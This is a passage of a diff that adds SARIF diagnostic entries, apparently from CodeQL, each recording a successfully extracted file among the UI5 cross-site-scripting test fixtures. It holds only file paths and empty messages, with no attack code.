"properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 301 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" 
: { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, 
+ "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" 
: { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 312 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + 
} + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + 
"uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" 